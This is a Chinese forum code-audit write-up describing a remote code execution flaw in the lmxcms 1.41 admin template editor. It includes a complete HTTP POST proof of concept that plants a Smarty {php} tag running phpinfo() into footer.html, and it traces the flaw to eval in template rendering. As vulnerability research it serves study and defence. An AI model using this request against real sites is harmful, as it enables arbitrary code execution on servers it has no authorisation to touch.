关于lmxcms1.41初级代码审计

xzz   ·   发表于 2024-02-02 19:54:16   ·   代码审计

1、RCE代码执行

漏洞条件:

  1. 漏洞url: http://lmxcmm1.41.com/admin.php?m=Template&a=editfile&dir=default
  2. 漏洞参数:temcontent
  3. 是否存在限制:
  4. 是否还有其他条件:使用smarty模板,m=Template

复现

  1. POST /admin.php?m=Template&a=editfile&dir=default HTTP/1.1
  2. Host: lmxcmm1.41.com
  3. Content-Length: 564
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. Origin: http://lmxcmm1.41.com
  7. Content-Type: application/x-www-form-urlencoded
  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  10. Referer: http://lmxcmm1.41.com/admin.php?m=Template&a=editfile&dir=default/footer.html
  11. Accept-Encoding: gzip, deflate
  12. Accept-Language: zh-CN,zh;q=0.9
  13. Cookie: PHPSESSID=pu9aa35v02aabukef267n96k74
  14. Connection: close
  15. temcontent=%3Cdiv+class%3D%22footerBox+width%22%3E%0D%0A%09%3Cdiv+class%3D%22footer%22%3E%0D%0A++++++++%3Cp%3E%3C%7Bphp%7D%3Ephpinfo%28%29%3B%3C%7B%2Fphp%7D%3E%E6%88%91%E7%9A%84%E7%BD%91%E7%AB%99+%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89+2014+%E6%B9%98ICP%E5%A4%878888888%3Cbr+%2F%3EPowered+by+%3Ca+href%3D%22http%3A%2F%2Fwww.lmxcms.com%22%3Elmxcms%3C%2Fa%3E+%3C%7B%24version%7D%3E+%C2%A92014+%3Ca+href%3D%22http%3A%2F%2Fwww.lmxcms.com%22%3Ewww.lmxcms.com%3C%2Fa%3E%3C%2Fp%3E%0D%0A++++%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E&filename=footer.html&settemcontent=%E6%8F%90%E4%BA%A4
  1. 查看如何编写这个标签

  1. 提交后访问前台首页

代码

  1. 搜索smarty模板。一般模板功能会出现eval函数的执行,因为有可能在前端页面通过php的代码去实现一些内容。首页、头部、尾页文件htmladmin目录下的template文件。

  1. 在执行文件写入的时候也不会有限制

  1. 通过文件找到对应功能位置,果然是在模板调用时。

  1. 打开一个尾部html,发现和页面显示不同。要么是存储的变量,变量等于1.41。或者写道数据库了,通过model层去除1.41然后显示。因为是个html文件,不能执行php代码,所以会引用eval强制执行造成rce

修复建议

  1. 对所有的输入进行严格的验证和清洁,并确保对外部输入的处理安全可控。

2、RCE代码执行

更多内容已被隐藏
主题内容你需要付费可见 (点击购买) 售价:1 金币
用户名金币积分时间理由
Track-魔方 100.00 0 2024-03-03 15:03:27 2月份投稿活动奖励结算 首次投稿一篇有效文章 100
Track-魔方 600.00 0 2024-02-04 18:06:54 深度 200 普适 200 可读 200

打赏我,让我更有动力~

9 条回复   |  直到 9天前 | 449 次浏览

黑影
发表于 10个月前

1

评论列表

  • 加载数据中...

编写评论内容

小瑟斯
发表于 10个月前

2

评论列表

  • 加载数据中...

编写评论内容

格林
发表于 10个月前

1

评论列表

  • 加载数据中...

编写评论内容

叴龙
发表于 10个月前

666

评论列表

  • 加载数据中...

编写评论内容

chd611
发表于 10个月前

学习来看看

评论列表

  • 加载数据中...

编写评论内容

小枭
发表于 9个月前

1

评论列表

  • 加载数据中...

编写评论内容

2461975828
发表于 1个月前

666

评论列表

  • 加载数据中...

编写评论内容

admin12
发表于 1个月前

666

评论列表

  • 加载数据中...

编写评论内容

gwkxw1nz0zqp
发表于 9天前

1

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.